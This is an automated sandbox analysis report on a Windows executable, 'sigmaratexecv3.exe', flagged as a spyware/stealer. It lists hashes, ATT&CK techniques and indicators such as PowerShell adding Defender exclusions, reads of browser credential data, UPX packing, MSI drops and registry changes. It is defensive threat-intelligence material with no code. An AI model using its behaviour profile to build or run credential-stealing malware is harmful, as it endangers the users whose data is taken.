307b1acd876c7303ee86290b36a1cd35a4cd074671bcff4dbaff8e7d4ecbffcf

Resubmissions

11-05-2024 16:54

240511-vencxsbb39 8

11-05-2024 16:45

240511-t9pnssga2y 8

Analysis

max time kernel
158s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2024 16:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sigmaratexecv3.exe
Size

15.8MB
MD5

278f86bfca38365b29120354f3c2884f
SHA1

9a3d76f6775d082ce5907503e12c9810e79f10a7
SHA256

307b1acd876c7303ee86290b36a1cd35a4cd074671bcff4dbaff8e7d4ecbffcf
SHA512

072cc4e72a564ad2543d1fafcdf824b7086c6020f661aafc58f26b78620a1d211b09af94da53e1ae8471ad73a92774e69877d3da974ae5ef8faba70838ee1854
SSDEEP

393216:9o9Ddnnx89uxfQ5L1V8dkurEUWjPCEhM1tkRmyV+da:i9ZnxGuWRndbqh16Rm4+da

Score

8^/10

execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1676	powershell.exe
3612	powershell.exe
4860	powershell.exe
2228	powershell.exe
1792	powershell.exe
4476	powershell.exe

Loads dropped DLL 64 IoCs

pid	Process
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
4292	MsiExec.exe
1524	MsiExec.exe
3444	MsiExec.exe
3340	MsiExec.exe
1344	sigmaratexecv3.exe
1344	sigmaratexecv3.exe
1344	sigmaratexecv3.exe
1344	sigmaratexecv3.exe
1344	sigmaratexecv3.exe
1344	sigmaratexecv3.exe
1344	sigmaratexecv3.exe
1344	sigmaratexecv3.exe
1344	sigmaratexecv3.exe
1344	sigmaratexecv3.exe
1344	sigmaratexecv3.exe
1344	sigmaratexecv3.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000234aa-95.dat	upx
behavioral1/memory/1664-99-0x00007FFC19870000-0x00007FFC19F49000-memory.dmp	upx
behavioral1/files/0x00070000000234a4-106.dat	upx
behavioral1/files/0x0007000000023482-105.dat	upx
behavioral1/memory/1664-108-0x00007FFC2EE10000-0x00007FFC2EE35000-memory.dmp	upx
behavioral1/files/0x0007000000023485-114.dat	upx
behavioral1/files/0x000700000002348d-133.dat	upx
behavioral1/files/0x0007000000023489-129.dat	upx
behavioral1/files/0x00070000000234ad-138.dat	upx
behavioral1/files/0x0007000000023488-141.dat	upx
behavioral1/files/0x00070000000234a3-144.dat	upx
behavioral1/files/0x0007000000023484-143.dat	upx
behavioral1/memory/1664-145-0x00007FFC2DD10000-0x00007FFC2DD24000-memory.dmp	upx
behavioral1/memory/1664-146-0x00007FFC19340000-0x00007FFC19869000-memory.dmp	upx
behavioral1/memory/1664-142-0x00007FFC2DE00000-0x00007FFC2DE0D000-memory.dmp	upx
behavioral1/memory/1664-140-0x00007FFC2DE70000-0x00007FFC2DE7D000-memory.dmp	upx
behavioral1/memory/1664-139-0x00007FFC2DE10000-0x00007FFC2DE29000-memory.dmp	upx
behavioral1/memory/1664-136-0x00007FFC2B3F0000-0x00007FFC2B3FD000-memory.dmp	upx
behavioral1/memory/1664-134-0x00007FFC2DE80000-0x00007FFC2DEAD000-memory.dmp	upx
behavioral1/files/0x000700000002348b-131.dat	upx
behavioral1/files/0x000700000002348a-130.dat	upx
behavioral1/files/0x0007000000023487-127.dat	upx
behavioral1/files/0x0007000000023486-126.dat	upx
behavioral1/files/0x0007000000023483-124.dat	upx
behavioral1/files/0x0007000000023481-123.dat	upx
behavioral1/files/0x000700000002347f-122.dat	upx
behavioral1/files/0x00070000000234af-120.dat	upx
behavioral1/files/0x00070000000234ae-119.dat	upx
behavioral1/files/0x00070000000234a8-117.dat	upx
behavioral1/files/0x00070000000234a5-116.dat	upx
behavioral1/memory/1664-113-0x00007FFC2EC70000-0x00007FFC2EC89000-memory.dmp	upx
behavioral1/files/0x0007000000023480-111.dat	upx
behavioral1/memory/1664-109-0x00007FFC324A0000-0x00007FFC324AF000-memory.dmp	upx
behavioral1/memory/1664-149-0x00007FFC28EA0000-0x00007FFC28ED3000-memory.dmp	upx
behavioral1/memory/1664-150-0x00007FFC28180000-0x00007FFC2824D000-memory.dmp	upx
behavioral1/memory/1664-156-0x00007FFC28590000-0x00007FFC285C5000-memory.dmp	upx
behavioral1/memory/1664-157-0x00007FFC287D0000-0x00007FFC287E2000-memory.dmp	upx
behavioral1/memory/1664-155-0x00007FFC2A6B0000-0x00007FFC2A6C6000-memory.dmp	upx
behavioral1/memory/1664-154-0x00007FFC19870000-0x00007FFC19F49000-memory.dmp	upx
behavioral1/memory/1664-161-0x00007FFC19FF0000-0x00007FFC1A166000-memory.dmp	upx
behavioral1/memory/1664-160-0x00007FFC28560000-0x00007FFC28584000-memory.dmp	upx
behavioral1/files/0x00070000000234a7-163.dat	upx
behavioral1/memory/1664-165-0x00007FFC28540000-0x00007FFC28558000-memory.dmp	upx
behavioral1/memory/1664-164-0x00007FFC2B3F0000-0x00007FFC2B3FD000-memory.dmp	upx
behavioral1/files/0x0007000000023493-167.dat	upx
behavioral1/memory/1664-169-0x00007FFC2A5B0000-0x00007FFC2A5BB000-memory.dmp	upx
behavioral1/files/0x0007000000023494-168.dat	upx
behavioral1/memory/1664-175-0x00007FFC18FC0000-0x00007FFC190DB000-memory.dmp	upx
behavioral1/memory/1664-174-0x00007FFC2DD10000-0x00007FFC2DD24000-memory.dmp	upx
behavioral1/memory/1664-173-0x00007FFC27230000-0x00007FFC27257000-memory.dmp	upx
behavioral1/memory/1664-172-0x00007FFC19340000-0x00007FFC19869000-memory.dmp	upx
behavioral1/files/0x0007000000023457-176.dat	upx
behavioral1/files/0x0007000000023453-180.dat	upx
behavioral1/memory/1664-190-0x00007FFC28170000-0x00007FFC2817B000-memory.dmp	upx
behavioral1/memory/1664-189-0x00007FFC28530000-0x00007FFC2853C000-memory.dmp	upx
behavioral1/memory/1664-188-0x00007FFC28180000-0x00007FFC2824D000-memory.dmp	upx
behavioral1/files/0x0007000000023454-187.dat	upx
behavioral1/files/0x000700000002345a-186.dat	upx
behavioral1/memory/1664-185-0x00007FFC287C0000-0x00007FFC287CB000-memory.dmp	upx
behavioral1/memory/1664-204-0x00007FFC25AE0000-0x00007FFC25AEC000-memory.dmp	upx
behavioral1/memory/1664-205-0x00007FFC18D30000-0x00007FFC18FB3000-memory.dmp	upx
behavioral1/memory/1664-203-0x00007FFC20100000-0x00007FFC20112000-memory.dmp	upx
behavioral1/memory/1664-202-0x00007FFC25AF0000-0x00007FFC25AFD000-memory.dmp	upx
behavioral1/memory/1664-201-0x00007FFC25B00000-0x00007FFC25B0C000-memory.dmp	upx

Blocklisted process makes network request 5 IoCs

flow	pid	Process
90	4408	msiexec.exe
92	4408	msiexec.exe
110	4072	msiexec.exe
119	2996	msiexec.exe
121	4072	msiexec.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\python31.dll	msiexec.exe

Drops file in Windows directory 25 IoCs

description	ioc	Process
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\{D40AF016-506C-43FB-A738-BD54FA8C1E86}\python_icon.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF922.tmp	msiexec.exe
File created	C:\Windows\Installer\e5887e8.msi	msiexec.exe
File created	C:\Windows\WinSxS\InstallTemp\20240511164922438.0\msvcp90.dll	msiexec.exe
File opened for modification	C:\Windows\WinSxS\InstallTemp\20240511164922438.0	msiexec.exe
File opened for modification	C:\Windows\Installer\e5887eb.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI89FB.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{D40AF016-506C-43FB-A738-BD54FA8C1E86}	msiexec.exe
File opened for modification	C:\Windows\Installer\{D40AF016-506C-43FB-A738-BD54FA8C1E86}\python_icon.exe	msiexec.exe
File created	C:\Windows\Installer\e5887eb.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8BF0.tmp	msiexec.exe
File created	C:\Windows\WinSxS\InstallTemp\20240511164922438.0\msvcm90.dll	msiexec.exe
File created	C:\Windows\WinSxS\InstallTemp\20240511164922516.0\9.0.21022.8.cat	msiexec.exe
File opened for modification	C:\Windows\Installer\e5887e8.msi	msiexec.exe
File created	C:\Windows\Installer\e5887ea.msi	msiexec.exe
File opened for modification	C:\Windows\WinSxS\InstallTemp\20240511164922516.0	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\WinSxS\InstallTemp\20240511164922438.0\amd64_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_0296e955.manifest	msiexec.exe
File created	C:\Windows\WinSxS\InstallTemp\20240511164922438.0\msvcr90.dll	msiexec.exe
File created	C:\Windows\WinSxS\InstallTemp\20240511164922516.0\9.0.21022.8.policy	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFAF8.tmp	msiexec.exe
File created	C:\Windows\WinSxS\InstallTemp\20240511164922438.0\amd64_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_0296e955.cat	msiexec.exe
File created	C:\Windows\Installer\e5887ed.msi	msiexec.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000072b368a908c284c40000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000072b368a90000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090072b368a9000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d72b368a9000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000072b368a900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133599196828197423"	chrome.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b	msiexec.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Python.File\shell	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.py	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\610FA04DC605BF347A83DB45AFC8E168\SharedCRT	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\610FA04DC605BF347A83DB45AFC8E168\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\610FA04DC605BF347A83DB45AFC8E168\SourceList\Media	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Installer\Products\610FA04DC605BF347A83DB45AFC8E168\SourceList	msiexec.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.CompiledFile\DefaultIcon	msiexec.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.File\shell\Edit with IDLE\command	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Python.File\shellex\DropHandler\ = "{60254CA5-953B-11CF-8C96-00AA00B8708C}"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.pyw\Content Type = "text/plain"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.File\shell\open	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Python.CompiledFile\shell\open\command	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.CompiledFile\shellex	msiexec.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.File	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	chrome.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.File\shellex\DropHandler\ = "{60254CA5-953B-11CF-8C96-00AA00B8708C}"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\610FA04DC605BF347A83DB45AFC8E168\Extensions = "DefaultFeature"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\610FA04DC605BF347A83DB45AFC8E168	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\610FA04DC605BF347A83DB45AFC8E168\Assignment = "1"	msiexec.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.NoConFile\shellex	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Python.NoConFile\DefaultIcon	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.NoConFile\shell\open\command	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.File\shell\Edit with IDLE\command\ = "\"C:\\Python31\\pythonw.exe\" \"C:\\Python31\\Lib\\idlelib\\idle.pyw\" -e \"%1\""	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\610FA04DC605BF347A83DB45AFC8E168	msiexec.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.File\shell\Edit with IDLE	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\.pyc	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Python.NoConFile\shell\open\command\ = "\"C:\\Python31\\pythonw.exe\" \"%1\" %*"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Python.NoConFile\shell\Edit with IDLE\command\ = "\"C:\\Python31\\pythonw.exe\" \"C:\\Python31\\Lib\\idlelib\\idle.pyw\" -e \"%1\""	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Python.File\shellex\DropHandler	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.CompiledFile\shellex\DropHandler	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\610FA04DC605BF347A83DB45AFC8E168\DefaultFeature	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\610FA04DC605BF347A83DB45AFC8E168\SourceList\Net	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Python.CompiledFile\shellex\DropHandler	msiexec.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\610FA04DC605BF347A83DB45AFC8E168	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\.pyo\ = "Python.CompiledFile"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Python.NoConFile\DefaultIcon	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\610FA04DC605BF347A83DB45AFC8E168\SourceList	msiexec.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.NoConFile\shell\Edit with IDLE\command	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Python.CompiledFile\shell\open\command	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Python.File\DefaultIcon	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.CompiledFile\shell\open	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.CompiledFile\ = "Compiled Python File"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.NoConFile\shellex\DropHandler\ = "{60254CA5-953B-11CF-8C96-00AA00B8708C}"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Python.CompiledFile\shellex\DropHandler	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Installer\Win32Assemblies\Global	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Python.NoConFile\shell	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Python.File\shell\Edit with IDLE\command\ = "\"C:\\Python31\\pythonw.exe\" \"C:\\Python31\\Lib\\idlelib\\idle.pyw\" -e \"%1\""	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Python.NoConFile\DefaultIcon\ = "C:\\Python31\\DLLs\\py.ico"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.File\shell\Edit with IDLE	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.CompiledFile\DefaultIcon\ = "C:\\Python31\\DLLs\\pyc.ico"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\610FA04DC605BF347A83DB45AFC8E168\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Python.NoConFile\shell\Edit with IDLE	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Python.CompiledFile\DefaultIcon	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Python.File\shellex	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Python.File\shell\open\command	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.File\shell	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.File\ = "Python File"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.NoConFile\ = "Python File (no console)"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\610FA04DC605BF347A83DB45AFC8E168\AdvertiseFlags = "388"	msiexec.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.NoConFile\shellex\DropHandler	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\.pyw\ = "Python.NoConFile"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\.pyw\Content Type = "text/plain"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Python.NoConFile\ = "Python File (no console)"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Python.File\shell\Edit with IDLE\command	msiexec.exe

Suspicious behavior: EnumeratesProcesses 31 IoCs

pid	Process
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
1664	sigmaratexecv3.exe
2860	powershell.exe
2860	powershell.exe
2228	powershell.exe
2228	powershell.exe
1676	powershell.exe
1676	powershell.exe
1476	chrome.exe
1476	chrome.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4072	msiexec.exe
4072	msiexec.exe
4072	msiexec.exe
4072	msiexec.exe
1344	sigmaratexecv3.exe
1344	sigmaratexecv3.exe
1344	sigmaratexecv3.exe
1344	sigmaratexecv3.exe
4616	powershell.exe
4616	powershell.exe
3612	powershell.exe
3612	powershell.exe
4860	powershell.exe
4860	powershell.exe
1792	powershell.exe
1792	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1664	sigmaratexecv3.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	2228	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
